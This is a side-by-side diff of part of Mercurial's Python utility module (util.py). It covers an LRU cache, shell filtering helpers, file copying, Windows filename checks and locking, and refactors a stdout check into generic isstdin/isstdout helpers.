1005 1005 tr.release()
1006 1006
1007 1007 @contextlib.contextmanager
1008 1008 def nullcontextmanager():
1009 1009 yield
1010 1010
1011 1011 class _lrucachenode(object):
1012 1012 """A node in a doubly linked list.
1013 1013
1014 1014 Holds a reference to nodes on either side as well as a key-value
1015 1015 pair for the dictionary entry.
1016 1016 """
1017 1017 __slots__ = (u'next', u'prev', u'key', u'value')
1018 1018
1019 1019 def __init__(self):
1020 1020 self.next = None
1021 1021 self.prev = None
1022 1022
1023 1023 self.key = _notset
1024 1024 self.value = None
1025 1025
1026 1026 def markempty(self):
1027 1027 """Mark the node as emptied."""
1028 1028 self.key = _notset
1029 1029
1030 1030 class lrucachedict(object):
1031 1031 """Dict that caches most recent accesses and sets.
1032 1032
1033 1033 The dict consists of an actual backing dict - indexed by original
1034 1034 key - and a doubly linked circular list defining the order of entries in
1035 1035 the cache.
1036 1036
1037 1037 The head node is the newest entry in the cache. If the cache is full,
1038 1038 we recycle head.prev and make it the new head. Cache accesses result in
1039 1039 the node being moved to before the existing head and being marked as the
1040 1040 new head node.
1041 1041 """
1042 1042 def __init__(self, max):
1043 1043 self._cache = {}
1044 1044
1045 1045 self._head = head = _lrucachenode()
1046 1046 head.prev = head
1047 1047 head.next = head
1048 1048 self._size = 1
1049 1049 self._capacity = max
1050 1050
1051 1051 def __len__(self):
1052 1052 return len(self._cache)
1053 1053
1054 1054 def __contains__(self, k):
1055 1055 return k in self._cache
1056 1056
1057 1057 def __iter__(self):
1058 1058 # We don't have to iterate in cache order, but why not.
1059 1059 n = self._head
1060 1060 for i in range(len(self._cache)):
1061 1061 yield n.key
1062 1062 n = n.next
1063 1063
1064 1064 def __getitem__(self, k):
1065 1065 node = self._cache[k]
1066 1066 self._movetohead(node)
1067 1067 return node.value
1068 1068
1069 1069 def __setitem__(self, k, v):
1070 1070 node = self._cache.get(k)
1071 1071 # Replace existing value and mark as newest.
1072 1072 if node is not None:
1073 1073 node.value = v
1074 1074 self._movetohead(node)
1075 1075 return
1076 1076
1077 1077 if self._size < self._capacity:
1078 1078 node = self._addcapacity()
1079 1079 else:
1080 1080 # Grab the last/oldest item.
1081 1081 node = self._head.prev
1082 1082
1083 1083 # At capacity. Kill the old entry.
1084 1084 if node.key is not _notset:
1085 1085 del self._cache[node.key]
1086 1086
1087 1087 node.key = k
1088 1088 node.value = v
1089 1089 self._cache[k] = node
1090 1090 # And mark it as newest entry. No need to adjust order since it
1091 1091 # is already self._head.prev.
1092 1092 self._head = node
1093 1093
1094 1094 def __delitem__(self, k):
1095 1095 node = self._cache.pop(k)
1096 1096 node.markempty()
1097 1097
1098 1098 # Temporarily mark as newest item before re-adjusting head to make
1099 1099 # this node the oldest item.
1100 1100 self._movetohead(node)
1101 1101 self._head = node.next
1102 1102
1103 1103 # Additional dict methods.
1104 1104
1105 1105 def get(self, k, default=None):
1106 1106 try:
1107 1107 return self._cache[k].value
1108 1108 except KeyError:
1109 1109 return default
1110 1110
1111 1111 def clear(self):
1112 1112 n = self._head
1113 1113 while n.key is not _notset:
1114 1114 n.markempty()
1115 1115 n = n.next
1116 1116
1117 1117 self._cache.clear()
1118 1118
1119 1119 def copy(self):
1120 1120 result = lrucachedict(self._capacity)
1121 1121 n = self._head.prev
1122 1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1123 1123 for i in range(len(self._cache)):
1124 1124 result[n.key] = n.value
1125 1125 n = n.prev
1126 1126 return result
1127 1127
1128 1128 def _movetohead(self, node):
1129 1129 """Mark a node as the newest, making it the new head.
1130 1130
1131 1131 When a node is accessed, it becomes the freshest entry in the LRU
1132 1132 list, which is denoted by self._head.
1133 1133
1134 1134 Visually, let's make ``N`` the new head node (* denotes head):
1135 1135
1136 1136 previous/oldest <-> head <-> next/next newest
1137 1137
1138 1138 ----<->--- A* ---<->-----
1139 1139 | |
1140 1140 E <-> D <-> N <-> C <-> B
1141 1141
1142 1142 To:
1143 1143
1144 1144 ----<->--- N* ---<->-----
1145 1145 | |
1146 1146 E <-> D <-> C <-> B <-> A
1147 1147
1148 1148 This requires the following moves:
1149 1149
1150 1150 C.next = D (node.prev.next = node.next)
1151 1151 D.prev = C (node.next.prev = node.prev)
1152 1152 E.next = N (head.prev.next = node)
1153 1153 N.prev = E (node.prev = head.prev)
1154 1154 N.next = A (node.next = head)
1155 1155 A.prev = N (head.prev = node)
1156 1156 """
1157 1157 head = self._head
1158 1158 # C.next = D
1159 1159 node.prev.next = node.next
1160 1160 # D.prev = C
1161 1161 node.next.prev = node.prev
1162 1162 # N.prev = E
1163 1163 node.prev = head.prev
1164 1164 # N.next = A
1165 1165 # It is tempting to do just "head" here, however if node is
1166 1166 # adjacent to head, this will do bad things.
1167 1167 node.next = head.prev.next
1168 1168 # E.next = N
1169 1169 node.next.prev = node
1170 1170 # A.prev = N
1171 1171 node.prev.next = node
1172 1172
1173 1173 self._head = node
1174 1174
1175 1175 def _addcapacity(self):
1176 1176 """Add a node to the circular linked list.
1177 1177
1178 1178 The new node is inserted before the head node.
1179 1179 """
1180 1180 head = self._head
1181 1181 node = _lrucachenode()
1182 1182 head.prev.next = node
1183 1183 node.prev = head.prev
1184 1184 node.next = head
1185 1185 head.prev = node
1186 1186 self._size += 1
1187 1187 return node
1188 1188
1189 1189 def lrucachefunc(func):
1190 1190 '''cache most recent results of function calls'''
1191 1191 cache = {}
1192 1192 order = collections.deque()
1193 1193 if func.__code__.co_argcount == 1:
1194 1194 def f(arg):
1195 1195 if arg not in cache:
1196 1196 if len(cache) > 20:
1197 1197 del cache[order.popleft()]
1198 1198 cache[arg] = func(arg)
1199 1199 else:
1200 1200 order.remove(arg)
1201 1201 order.append(arg)
1202 1202 return cache[arg]
1203 1203 else:
1204 1204 def f(*args):
1205 1205 if args not in cache:
1206 1206 if len(cache) > 20:
1207 1207 del cache[order.popleft()]
1208 1208 cache[args] = func(*args)
1209 1209 else:
1210 1210 order.remove(args)
1211 1211 order.append(args)
1212 1212 return cache[args]
1213 1213
1214 1214 return f
1215 1215
1216 1216 class propertycache(object):
1217 1217 def __init__(self, func):
1218 1218 self.func = func
1219 1219 self.name = func.__name__
1220 1220 def __get__(self, obj, type=None):
1221 1221 result = self.func(obj)
1222 1222 self.cachevalue(obj, result)
1223 1223 return result
1224 1224
1225 1225 def cachevalue(self, obj, value):
1226 1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1227 1227 obj.__dict__[self.name] = value
1228 1228
1229 1229 def clearcachedproperty(obj, prop):
1230 1230 '''clear a cached property value, if one has been set'''
1231 1231 if prop in obj.__dict__:
1232 1232 del obj.__dict__[prop]
1233 1233
1234 1234 def pipefilter(s, cmd):
1235 1235 '''filter string S through command CMD, returning its output'''
1236 1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1237 1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1238 1238 pout, perr = p.communicate(s)
1239 1239 return pout
1240 1240
1241 1241 def tempfilter(s, cmd):
1242 1242 '''filter string S through a pair of temporary files with CMD.
1243 1243 CMD is used as a template to create the real command to be run,
1244 1244 with the strings INFILE and OUTFILE replaced by the real names of
1245 1245 the temporary files generated.'''
1246 1246 inname, outname = None, None
1247 1247 try:
1248 1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1249 1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1250 1250 fp.write(s)
1251 1251 fp.close()
1252 1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1253 1253 os.close(outfd)
1254 1254 cmd = cmd.replace('INFILE', inname)
1255 1255 cmd = cmd.replace('OUTFILE', outname)
1256 1256 code = os.system(cmd)
1257 1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1258 1258 code = 0
1259 1259 if code:
1260 1260 raise Abort(_("command '%s' failed: %s") %
1261 1261 (cmd, explainexit(code)))
1262 1262 return readfile(outname)
1263 1263 finally:
1264 1264 try:
1265 1265 if inname:
1266 1266 os.unlink(inname)
1267 1267 except OSError:
1268 1268 pass
1269 1269 try:
1270 1270 if outname:
1271 1271 os.unlink(outname)
1272 1272 except OSError:
1273 1273 pass
1274 1274
1275 1275 filtertable = {
1276 1276 'tempfile:': tempfilter,
1277 1277 'pipe:': pipefilter,
1278 1278 }
1279 1279
1280 1280 def filter(s, cmd):
1281 1281 "filter a string through a command that transforms its input to its output"
1282 1282 for name, fn in filtertable.iteritems():
1283 1283 if cmd.startswith(name):
1284 1284 return fn(s, cmd[len(name):].lstrip())
1285 1285 return pipefilter(s, cmd)
1286 1286
1287 1287 def binary(s):
1288 1288 """return true if a string is binary data"""
1289 1289 return bool(s and '\0' in s)
1290 1290
1291 1291 def increasingchunks(source, min=1024, max=65536):
1292 1292 '''return no less than min bytes per chunk while data remains,
1293 1293 doubling min after each chunk until it reaches max'''
1294 1294 def log2(x):
1295 1295 if not x:
1296 1296 return 0
1297 1297 i = 0
1298 1298 while x:
1299 1299 x >>= 1
1300 1300 i += 1
1301 1301 return i - 1
1302 1302
1303 1303 buf = []
1304 1304 blen = 0
1305 1305 for chunk in source:
1306 1306 buf.append(chunk)
1307 1307 blen += len(chunk)
1308 1308 if blen >= min:
1309 1309 if min < max:
1310 1310 min = min << 1
1311 1311 nmin = 1 << log2(blen)
1312 1312 if nmin > min:
1313 1313 min = nmin
1314 1314 if min > max:
1315 1315 min = max
1316 1316 yield ''.join(buf)
1317 1317 blen = 0
1318 1318 buf = []
1319 1319 if buf:
1320 1320 yield ''.join(buf)
1321 1321
1322 1322 Abort = error.Abort
1323 1323
1324 1324 def always(fn):
1325 1325 return True
1326 1326
1327 1327 def never(fn):
1328 1328 return False
1329 1329
1330 1330 def nogc(func):
1331 1331 """disable garbage collector
1332 1332
1333 1333 Python's garbage collector triggers a GC each time a certain number of
1334 1334 container objects (the number being defined by gc.get_threshold()) are
1335 1335 allocated even when marked not to be tracked by the collector. Tracking has
1336 1336 no effect on when GCs are triggered, only on what objects the GC looks
1337 1337 into. As a workaround, disable GC while building complex (huge)
1338 1338 containers.
1339 1339
1340 1340 This garbage collector issue have been fixed in 2.7. But it still affect
1341 1341 CPython's performance.
1342 1342 """
1343 1343 def wrapper(*args, **kwargs):
1344 1344 gcenabled = gc.isenabled()
1345 1345 gc.disable()
1346 1346 try:
1347 1347 return func(*args, **kwargs)
1348 1348 finally:
1349 1349 if gcenabled:
1350 1350 gc.enable()
1351 1351 return wrapper
1352 1352
1353 1353 if pycompat.ispypy:
1354 1354 # PyPy runs slower with gc disabled
1355 1355 nogc = lambda x: x
1356 1356
1357 1357 def pathto(root, n1, n2):
1358 1358 '''return the relative path from one place to another.
1359 1359 root should use os.sep to separate directories
1360 1360 n1 should use os.sep to separate directories
1361 1361 n2 should use "/" to separate directories
1362 1362 returns an os.sep-separated path.
1363 1363
1364 1364 If n1 is a relative path, it's assumed it's
1365 1365 relative to root.
1366 1366 n2 should always be relative to root.
1367 1367 '''
1368 1368 if not n1:
1369 1369 return localpath(n2)
1370 1370 if os.path.isabs(n1):
1371 1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1372 1372 return os.path.join(root, localpath(n2))
1373 1373 n2 = '/'.join((pconvert(root), n2))
1374 1374 a, b = splitpath(n1), n2.split('/')
1375 1375 a.reverse()
1376 1376 b.reverse()
1377 1377 while a and b and a[-1] == b[-1]:
1378 1378 a.pop()
1379 1379 b.pop()
1380 1380 b.reverse()
1381 1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1382 1382
1383 1383 def mainfrozen():
1384 1384 """return True if we are a frozen executable.
1385 1385
1386 1386 The code supports py2exe (most common, Windows only) and tools/freeze
1387 1387 (portable, not much used).
1388 1388 """
1389 1389 return (safehasattr(sys, "frozen") or # new py2exe
1390 1390 safehasattr(sys, "importers") or # old py2exe
1391 1391 imp.is_frozen(u"__main__")) # tools/freeze
1392 1392
1393 1393 # the location of data files matching the source code
1394 1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1395 1395 # executable version (py2exe) doesn't support __file__
1396 1396 datapath = os.path.dirname(pycompat.sysexecutable)
1397 1397 else:
1398 1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1399 1399
1400 1400 i18n.setdatapath(datapath)
1401 1401
1402 1402 _hgexecutable = None
1403 1403
1404 1404 def hgexecutable():
1405 1405 """return location of the 'hg' executable.
1406 1406
1407 1407 Defaults to $HG or 'hg' in the search path.
1408 1408 """
1409 1409 if _hgexecutable is None:
1410 1410 hg = encoding.environ.get('HG')
1411 1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1412 1412 if hg:
1413 1413 _sethgexecutable(hg)
1414 1414 elif mainfrozen():
1415 1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1416 1416 # Env variable set by py2app
1417 1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1418 1418 else:
1419 1419 _sethgexecutable(pycompat.sysexecutable)
1420 1420 elif (os.path.basename(
1421 1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1422 1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1423 1423 else:
1424 1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1425 1425 _sethgexecutable(exe)
1426 1426 return _hgexecutable
1427 1427
1428 1428 def _sethgexecutable(path):
1429 1429 """set location of the 'hg' executable"""
1430 1430 global _hgexecutable
1431 1431 _hgexecutable = path
1432 1432
1433 def _isstdout(f):
1433 def _testfileno(f, stdf):
1434 1434 fileno = getattr(f, 'fileno', None)
1435 1435 try:
1436 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == stdf.fileno()
1437 1437 except io.UnsupportedOperation:
1438 1438 return False # fileno() raised UnsupportedOperation
1439 1439
1440 def isstdin(f):
1441 return _testfileno(f, sys.__stdin__)
1442
1443 def isstdout(f):
1444 return _testfileno(f, sys.__stdout__)
1445
1440 1446 def shellenviron(environ=None):
1441 1447 """return environ with optional override, useful for shelling out"""
1442 1448 def py2shell(val):
1443 1449 'convert python object into string that is useful to shell'
1444 1450 if val is None or val is False:
1445 1451 return '0'
1446 1452 if val is True:
1447 1453 return '1'
1448 1454 return pycompat.bytestr(val)
1449 1455 env = dict(encoding.environ)
1450 1456 if environ:
1451 1457 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1452 1458 env['HG'] = hgexecutable()
1453 1459 return env
1454 1460
1455 1461 def system(cmd, environ=None, cwd=None, out=None):
1456 1462 '''enhanced shell command execution.
1457 1463 run with environment maybe modified, maybe in different dir.
1458 1464
1459 1465 if out is specified, it is assumed to be a file-like object that has a
1460 1466 write() method. stdout and stderr will be redirected to out.'''
1461 1467 try:
1462 1468 stdout.flush()
1463 1469 except Exception:
1464 1470 pass
1465 1471 cmd = quotecommand(cmd)
1466 1472 env = shellenviron(environ)
1467 if out is None or _isstdout(out):
1473 if out is None or isstdout(out):
1468 1474 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1469 1475 env=env, cwd=cwd)
1470 1476 else:
1471 1477 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1472 1478 env=env, cwd=cwd, stdout=subprocess.PIPE,
1473 1479 stderr=subprocess.STDOUT)
1474 1480 for line in iter(proc.stdout.readline, ''):
1475 1481 out.write(line)
1476 1482 proc.wait()
1477 1483 rc = proc.returncode
1478 1484 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1479 1485 rc = 0
1480 1486 return rc
1481 1487
1482 1488 def checksignature(func):
1483 1489 '''wrap a function with code to check for calling errors'''
1484 1490 def check(*args, **kwargs):
1485 1491 try:
1486 1492 return func(*args, **kwargs)
1487 1493 except TypeError:
1488 1494 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1489 1495 raise error.SignatureError
1490 1496 raise
1491 1497
1492 1498 return check
1493 1499
1494 1500 # a whilelist of known filesystems where hardlink works reliably
1495 1501 _hardlinkfswhitelist = {
1496 1502 'btrfs',
1497 1503 'ext2',
1498 1504 'ext3',
1499 1505 'ext4',
1500 1506 'hfs',
1501 1507 'jfs',
1502 1508 'NTFS',
1503 1509 'reiserfs',
1504 1510 'tmpfs',
1505 1511 'ufs',
1506 1512 'xfs',
1507 1513 'zfs',
1508 1514 }
1509 1515
1510 1516 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1511 1517 '''copy a file, preserving mode and optionally other stat info like
1512 1518 atime/mtime
1513 1519
1514 1520 checkambig argument is used with filestat, and is useful only if
1515 1521 destination file is guarded by any lock (e.g. repo.lock or
1516 1522 repo.wlock).
1517 1523
1518 1524 copystat and checkambig should be exclusive.
1519 1525 '''
1520 1526 assert not (copystat and checkambig)
1521 1527 oldstat = None
1522 1528 if os.path.lexists(dest):
1523 1529 if checkambig:
1524 1530 oldstat = checkambig and filestat.frompath(dest)
1525 1531 unlink(dest)
1526 1532 if hardlink:
1527 1533 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1528 1534 # unless we are confident that dest is on a whitelisted filesystem.
1529 1535 try:
1530 1536 fstype = getfstype(os.path.dirname(dest))
1531 1537 except OSError:
1532 1538 fstype = None
1533 1539 if fstype not in _hardlinkfswhitelist:
1534 1540 hardlink = False
1535 1541 if hardlink:
1536 1542 try:
1537 1543 oslink(src, dest)
1538 1544 return
1539 1545 except (IOError, OSError):
1540 1546 pass # fall back to normal copy
1541 1547 if os.path.islink(src):
1542 1548 os.symlink(os.readlink(src), dest)
1543 1549 # copytime is ignored for symlinks, but in general copytime isn't needed
1544 1550 # for them anyway
1545 1551 else:
1546 1552 try:
1547 1553 shutil.copyfile(src, dest)
1548 1554 if copystat:
1549 1555 # copystat also copies mode
1550 1556 shutil.copystat(src, dest)
1551 1557 else:
1552 1558 shutil.copymode(src, dest)
1553 1559 if oldstat and oldstat.stat:
1554 1560 newstat = filestat.frompath(dest)
1555 1561 if newstat.isambig(oldstat):
1556 1562 # stat of copied file is ambiguous to original one
1557 1563 advanced = (
1558 1564 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1559 1565 os.utime(dest, (advanced, advanced))
1560 1566 except shutil.Error as inst:
1561 1567 raise Abort(str(inst))
1562 1568
1563 1569 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1564 1570 """Copy a directory tree using hardlinks if possible."""
1565 1571 num = 0
1566 1572
1567 1573 gettopic = lambda: hardlink and _('linking') or _('copying')
1568 1574
1569 1575 if os.path.isdir(src):
1570 1576 if hardlink is None:
1571 1577 hardlink = (os.stat(src).st_dev ==
1572 1578 os.stat(os.path.dirname(dst)).st_dev)
1573 1579 topic = gettopic()
1574 1580 os.mkdir(dst)
1575 1581 for name, kind in listdir(src):
1576 1582 srcname = os.path.join(src, name)
1577 1583 dstname = os.path.join(dst, name)
1578 1584 def nprog(t, pos):
1579 1585 if pos is not None:
1580 1586 return progress(t, pos + num)
1581 1587 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1582 1588 num += n
1583 1589 else:
1584 1590 if hardlink is None:
1585 1591 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1586 1592 os.stat(os.path.dirname(dst)).st_dev)
1587 1593 topic = gettopic()
1588 1594
1589 1595 if hardlink:
1590 1596 try:
1591 1597 oslink(src, dst)
1592 1598 except (IOError, OSError):
1593 1599 hardlink = False
1594 1600 shutil.copy(src, dst)
1595 1601 else:
1596 1602 shutil.copy(src, dst)
1597 1603 num += 1
1598 1604 progress(topic, num)
1599 1605 progress(topic, None)
1600 1606
1601 1607 return hardlink, num
1602 1608
1603 1609 _winreservednames = {
1604 1610 'con', 'prn', 'aux', 'nul',
1605 1611 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1606 1612 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1607 1613 }
1608 1614 _winreservedchars = ':*?"<>|'
1609 1615 def checkwinfilename(path):
1610 1616 r'''Check that the base-relative path is a valid filename on Windows.
1611 1617 Returns None if the path is ok, or a UI string describing the problem.
1612 1618
1613 1619 >>> checkwinfilename(b"just/a/normal/path")
1614 1620 >>> checkwinfilename(b"foo/bar/con.xml")
1615 1621 "filename contains 'con', which is reserved on Windows"
1616 1622 >>> checkwinfilename(b"foo/con.xml/bar")
1617 1623 "filename contains 'con', which is reserved on Windows"
1618 1624 >>> checkwinfilename(b"foo/bar/xml.con")
1619 1625 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1620 1626 "filename contains 'AUX', which is reserved on Windows"
1621 1627 >>> checkwinfilename(b"foo/bar/bla:.txt")
1622 1628 "filename contains ':', which is reserved on Windows"
1623 1629 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1624 1630 "filename contains '\\x07', which is invalid on Windows"
1625 1631 >>> checkwinfilename(b"foo/bar/bla ")
1626 1632 "filename ends with ' ', which is not allowed on Windows"
1627 1633 >>> checkwinfilename(b"../bar")
1628 1634 >>> checkwinfilename(b"foo\\")
1629 1635 "filename ends with '\\', which is invalid on Windows"
1630 1636 >>> checkwinfilename(b"foo\\/bar")
1631 1637 "directory name ends with '\\', which is invalid on Windows"
1632 1638 '''
1633 1639 if path.endswith('\\'):
1634 1640 return _("filename ends with '\\', which is invalid on Windows")
1635 1641 if '\\/' in path:
1636 1642 return _("directory name ends with '\\', which is invalid on Windows")
1637 1643 for n in path.replace('\\', '/').split('/'):
1638 1644 if not n:
1639 1645 continue
1640 1646 for c in _filenamebytestr(n):
1641 1647 if c in _winreservedchars:
1642 1648 return _("filename contains '%s', which is reserved "
1643 1649 "on Windows") % c
1644 1650 if ord(c) <= 31:
1645 1651 return _("filename contains '%s', which is invalid "
1646 1652 "on Windows") % escapestr(c)
1647 1653 base = n.split('.')[0]
1648 1654 if base and base.lower() in _winreservednames:
1649 1655 return _("filename contains '%s', which is reserved "
1650 1656 "on Windows") % base
1651 1657 t = n[-1:]
1652 1658 if t in '. ' and n not in '..':
1653 1659 return _("filename ends with '%s', which is not allowed "
1654 1660 "on Windows") % t
1655 1661
1656 1662 if pycompat.iswindows:
1657 1663 checkosfilename = checkwinfilename
1658 1664 timer = time.clock
1659 1665 else:
1660 1666 checkosfilename = platform.checkosfilename
1661 1667 timer = time.time
1662 1668
1663 1669 if safehasattr(time, "perf_counter"):
1664 1670 timer = time.perf_counter
1665 1671
1666 1672 def makelock(info, pathname):
1667 1673 """Create a lock file atomically if possible
1668 1674
1669 1675 This may leave a stale lock file if symlink isn't supported and signal
1670 1676 interrupt is enabled.
1671 1677 """
1672 1678 try:
1673 1679 return os.symlink(info, pathname)
1674 1680 except OSError as why:
1675 1681 if why.errno == errno.EEXIST:
1676 1682 raise
1677 1683 except AttributeError: # no symlink in os
1678 1684 pass
1679 1685
1680 1686 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1681 1687 ld = os.open(pathname, flags)
1682 1688 os.write(ld, info)
1683 1689 os.close(ld)
1684 1690
1685 1691 def readlock(pathname):
1686 1692 try:
1687 1693 return os.readlink(pathname)
1688 1694 except OSError as why:
1689 1695 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1690 1696 raise
1691 1697 except AttributeError: # no symlink in os
1692 1698 pass
1693 1699 fp = posixfile(pathname, 'rb')
1694 1700 r = fp.read()
1695 1701 fp.close()
1696 1702 return r
1697 1703
1698 1704 def fstat(fp):
1699 1705 '''stat file object that may not have fileno method.'''
1700 1706 try:
1701 1707 return os.fstat(fp.fileno())
1702 1708 except AttributeError:
1703 1709 return os.stat(fp.name)
1704 1710
1705 1711 # File system features
1706 1712
1707 1713 def fscasesensitive(path):
1708 1714 """
1709 1715 Return true if the given path is on a case-sensitive filesystem
1710 1716
1711 1717 Requires a path (like /foo/.hg) ending with a foldable final
1712 1718 directory component.
1713 1719 """
1714 1720 s1 = os.lstat(path)
1715 1721 d, b = os.path.split(path)
1716 1722 b2 = b.upper()
1717 1723 if b == b2:
1718 1724 b2 = b.lower()
1719 1725 if b == b2:
1720 1726 return True # no evidence against case sensitivity
1721 1727 p2 = os.path.join(d, b2)
1722 1728 try:
1723 1729 s2 = os.lstat(p2)
1724 1730 if s2 == s1:
1725 1731 return False
1726 1732 return True
1727 1733 except OSError:
1728 1734 return True
1729 1735
1730 1736 try:
1731 1737 import re2
1732 1738 _re2 = None
1733 1739 except ImportError:
1734 1740 _re2 = False
1735 1741
1736 1742 class _re(object):
1737 1743 def _checkre2(self):
1738 1744 global _re2
1739 1745 try:
1740 1746 # check if match works, see issue3964
1741 1747 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1742 1748 except ImportError:
1743 1749 _re2 = False
1744 1750
1745 1751 def compile(self, pat, flags=0):
1746 1752 '''Compile a regular expression, using re2 if possible
1747 1753
1748 1754 For best performance, use only re2-compatible regexp features. The
1749 1755 only flags from the re module that are re2-compatible are
1750 1756 IGNORECASE and MULTILINE.'''
1751 1757 if _re2 is None:
1752 1758 self._checkre2()
1753 1759 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1754 1760 if flags & remod.IGNORECASE:
1755 1761 pat = '(?i)' + pat
1756 1762 if flags & remod.MULTILINE:
1757 1763 pat = '(?m)' + pat
1758 1764 try:
1759 1765 return re2.compile(pat)
1760 1766 except re2.error:
1761 1767 pass
1762 1768 return remod.compile(pat, flags)
1763 1769
1764 1770 @propertycache
1765 1771 def escape(self):
1766 1772 '''Return the version of escape corresponding to self.compile.
1767 1773
1768 1774 This is imperfect because whether re2 or re is used for a particular
1769 1775 function depends on the flags, etc, but it's the best we can do.
1770 1776 '''
1771 1777 global _re2
1772 1778 if _re2 is None:
1773 1779 self._checkre2()
1774 1780 if _re2:
1775 1781 return re2.escape
1776 1782 else:
1777 1783 return remod.escape
1778 1784
1779 1785 re = _re()
1780 1786
1781 1787 _fspathcache = {}
1782 1788 def fspath(name, root):
1783 1789 '''Get name in the case stored in the filesystem
1784 1790
1785 1791 The name should be relative to root, and be normcase-ed for efficiency.
1786 1792
1787 1793 Note that this function is unnecessary, and should not be
1788 1794 called, for case-sensitive filesystems (simply because it's expensive).
1789 1795
1790 1796 The root should be normcase-ed, too.
1791 1797 '''
1792 1798 def _makefspathcacheentry(dir):
1793 1799 return dict((normcase(n), n) for n in os.listdir(dir))
1794 1800
1795 1801 seps = pycompat.ossep
1796 1802 if pycompat.osaltsep:
1797 1803 seps = seps + pycompat.osaltsep
1798 1804 # Protect backslashes. This gets silly very quickly.
1799 1805 seps.replace('\\','\\\\')
1800 1806 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1801 1807 dir = os.path.normpath(root)
1802 1808 result = []
1803 1809 for part, sep in pattern.findall(name):
1804 1810 if sep:
1805 1811 result.append(sep)
1806 1812 continue
1807 1813
1808 1814 if dir not in _fspathcache:
1809 1815 _fspathcache[dir] = _makefspathcacheentry(dir)
1810 1816 contents = _fspathcache[dir]
1811 1817
1812 1818 found = contents.get(part)
1813 1819 if not found:
1814 1820 # retry "once per directory" per "dirstate.walk" which
1815 1821 # may take place for each patches of "hg qpush", for example
1816 1822 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1817 1823 found = contents.get(part)
1818 1824
1819 1825 result.append(found or part)
1820 1826 dir = os.path.join(dir, part)
1821 1827
1822 1828 return ''.join(result)
1823 1829
1824 1830 def checknlink(testfile):
1825 1831 '''check whether hardlink count reporting works properly'''
1826 1832
1827 1833 # testfile may be open, so we need a separate file for checking to
1828 1834 # work around issue2543 (or testfile may get lost on Samba shares)
1829 1835 f1, f2, fp = None, None, None
1830 1836 try:
1831 1837 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1832 1838 suffix='1~', dir=os.path.dirname(testfile))
1833 1839 os.close(fd)
1834 1840 f2 = '%s2~' % f1[:-2]
1835 1841
1836 1842 oslink(f1, f2)
1837 1843 # nlinks() may behave differently for files on Windows shares if
1838 1844 # the file is open.
1839 1845 fp = posixfile(f2)
1840 1846 return nlinks(f2) > 1
1841 1847 except OSError:
1842 1848 return False
1843 1849 finally:
1844 1850 if fp is not None:
1845 1851 fp.close()
1846 1852 for f in (f1, f2):
1847 1853 try:
1848 1854 if f is not None:
1849 1855 os.unlink(f)
1850 1856 except OSError:
1851 1857 pass
1852 1858
1853 1859 def endswithsep(path):
1854 1860 '''Check path ends with os.sep or os.altsep.'''
1855 1861 return (path.endswith(pycompat.ossep)
1856 1862 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1857 1863
1858 1864 def splitpath(path):
1859 1865 '''Split path by os.sep.
1860 1866 Note that this function does not use os.altsep because this is
1861 1867 an alternative of simple "xxx.split(os.sep)".
1862 1868 It is recommended to use os.path.normpath() before using this
1863 1869 function if need.'''
1864 1870 return path.split(pycompat.ossep)
1865 1871
1866 1872 def gui():
1867 1873 '''Are we running in a GUI?'''
1868 1874 if pycompat.isdarwin:
1869 1875 if 'SSH_CONNECTION' in encoding.environ:
1870 1876 # handle SSH access to a box where the user is logged in
1871 1877 return False
1872 1878 elif getattr(osutil, 'isgui', None):
1873 1879 # check if a CoreGraphics session is available
1874 1880 return osutil.isgui()
1875 1881 else:
1876 1882 # pure build; use a safe default
1877 1883 return True
1878 1884 else:
1879 1885 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1880 1886
1881 1887 def mktempcopy(name, emptyok=False, createmode=None):
1882 1888 """Create a temporary file with the same contents from name
1883 1889
1884 1890 The permission bits are copied from the original file.
1885 1891
1886 1892 If the temporary file is going to be truncated immediately, you
1887 1893 can use emptyok=True as an optimization.
1888 1894
1889 1895 Returns the name of the temporary file.
1890 1896 """
1891 1897 d, fn = os.path.split(name)
